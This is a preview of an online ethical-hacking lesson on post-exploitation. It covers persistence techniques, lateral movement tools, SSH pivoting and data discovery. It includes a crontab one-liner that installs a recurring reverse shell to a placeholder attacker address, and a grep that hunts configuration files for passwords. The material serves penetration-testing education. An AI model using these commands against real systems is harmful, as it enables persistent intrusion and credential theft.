You are viewing a free preview of this lesson.
Subscribe to unlock all 10 lessons in this course and every other course on LearningBro.
Post-exploitation is what happens after gaining initial access. It demonstrates the true impact of a vulnerability by showing how far an attacker could go. Professional reporting then translates these technical findings into actionable recommendations for the organisation.
| Objective | Description |
|---|---|
| Maintain access | Establish persistent backdoors |
| Escalate privileges | Move from user to administrator/root |
| Lateral movement | Pivot to other systems on the network |
| Data discovery | Find sensitive data, credentials, configurations |
| Data exfiltration | Demonstrate that data can be extracted |
| Cover tracks | Understand how attackers hide their activity |
Tip: In ethical hacking, post-exploitation must stay within the agreed scope. Document everything and avoid unnecessary data access or system modifications.
Persistence ensures continued access if the initial entry point is patched:
| Technique | Platform | Description |
|---|---|---|
| Cron jobs | Linux | Schedule a reverse shell to connect periodically |
| SSH keys | Linux | Add attacker's public key to ~/.ssh/authorized_keys |
| Scheduled tasks | Windows | Use Task Scheduler for persistent execution |
| Registry run keys | Windows | Add entries to auto-start on login |
| Web shells | Web servers | Upload a PHP/ASP shell to the web root |
| Service creation | Windows | Create a service that runs attacker code |
| Startup scripts | Linux | Add commands to .bashrc, .profile, or init scripts |
# Add a reverse shell that connects every 5 minutes
(crontab -l; echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'") | crontab -
Moving from a compromised system to other systems on the network:
| Technique | Description | Tools |
|---|---|---|
| Pass the Hash | Use captured NTLM hashes to authenticate | CrackMapExec, Mimikatz |
| Pass the Ticket | Use Kerberos tickets for authentication | Mimikatz, Rubeus |
| PSExec | Remote command execution on Windows | Sysinternals PsExec, Impacket |
| WMI | Windows Management Instrumentation for remote execution | wmiexec |
| SSH pivoting | Tunnel through compromised hosts | SSH port forwarding |
| RDP | Remote desktop to other Windows systems | xfreerdp, rdesktop |
Pivoting uses a compromised host as a bridge to reach otherwise inaccessible networks:
┌──────────┐ ┌──────────────┐ ┌──────────────┐
│ Attacker │ ───→ │ Compromised │ ───→ │ Internal │
│ Machine │ │ Host (DMZ) │ │ Server │
│ │ │ 10.0.0.5 │ │ 10.10.0.100 │
└──────────┘ └──────────────┘ └──────────────┘
Cannot reach 10.10.0.100 directly
Pivot through 10.0.0.5 to access internal network
# SSH local port forwarding
ssh -L 8080:10.10.0.100:80 user@10.0.0.5
# SSH dynamic port forwarding (SOCKS proxy)
ssh -D 9050 user@10.0.0.5
# Using proxychains with the SOCKS proxy
proxychains nmap -sT -p 80,443 10.10.0.100
Find valuable data on compromised systems:
# Search for configuration files with passwords
grep -r "password" /etc/ /var/www/ /opt/ 2>/dev/null
Subscribe to continue reading
Get full access to this lesson and all 10 lessons in this course.